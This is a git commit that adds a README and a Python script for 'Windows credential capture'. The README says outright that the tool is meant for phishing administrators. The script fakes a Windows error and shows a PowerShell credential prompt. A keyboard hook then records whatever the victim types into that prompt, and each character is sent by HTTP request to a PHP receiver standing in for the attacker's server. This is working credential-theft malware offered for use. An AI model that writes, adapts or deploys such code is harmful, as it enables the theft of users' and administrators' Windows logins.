Add files via upload

jiushill · web-flow · commit e075e945d861 · 2019-08-13T00:58:21.000+08:00
diff --git a/windows凭证捕获/README.md b/windows凭证捕获/README.md
@@ -0,0 +1,18 @@
+### windows凭证捕获 ##
+可用于钓鱼管理员,最后脚本会将捕获到的:username和password
+
+通过请求指定的php来接收密码
+```python
+rqt=requests.get(url='http://127.0.0.1/jieshou.php?password={}'.format(str(j)),headers={'user-agent':'nb'})
+```
+
+请自行打包exe
+
+效果图如下：
+![](https://s2.ax1x.com/2019/08/13/mpheud.gif)
+
+由于要安装pyHook库，我这里直接上传了
+
+不要去lfd下，那个只要窗体不是Unicode编码就直接报错了
+https://www.lfd.uci.edu/~gohlke/pythonlibs/
+
diff --git a/windows凭证捕获/main.py b/windows凭证捕获/main.py
@@ -0,0 +1,50 @@
+#@author:
+#@file:main.py
+import pythoncom, pyHook
+import pyHook
+from ctypes import *
+import requests
+import win32api
+import win32con
+import os
+import threading
+
+win32api.MessageBox(0,"Windows凭证失效","Windows Error",win32con.MB_ICONERROR)
+os.popen(r'''powershell iex "$creds = $host.ui.PromptForCredential(\"Login Required\",\"Enter username and password.\", \"$env:username\",\"NewBiosUserName\");"''')
+print('[+] windows凭证捕获')
+passwd=[]
+def OnKeyboardEvent(event):
+    windowTitle=create_string_buffer(512)
+    windll.user32.GetWindowTextA(event.Window,byref(windowTitle),512)
+    windowname=windowTitle.value.decode('gbk')
+    if 'Login Required'==windowname:
+        key=chr(event.Ascii)
+        if key!='':
+            print('{}'.format(key),end='')
+            passwd.append(key)
+        elif len(key)==0:
+            print('\n')
+# return True to pass the event to other handlers
+    return True
+
+def run():
+    # create a hook manager
+    hm = pyHook.HookManager()
+    # watch for all mouse events
+    hm.KeyDown = OnKeyboardEvent
+    # set the hook
+    hm.HookKeyboard()
+    # wait forever
+    print('键盘输入:')
+    pythoncom.PumpMessages()
+
+if __name__ == '__main__':
+    t=threading.Thread(target=run,args=())
+    t.setDaemon(True)
+    t.start()
+    t.join(10)
+    for j in passwd:
+        if str(j)=='\x00' or str(j)=='\t':
+            pass
+        else:
+            rqt=requests.get(url='http://127.0.0.1/jieshou.php?password={}'.format(str(j)),headers={'user-agent':'nb'})
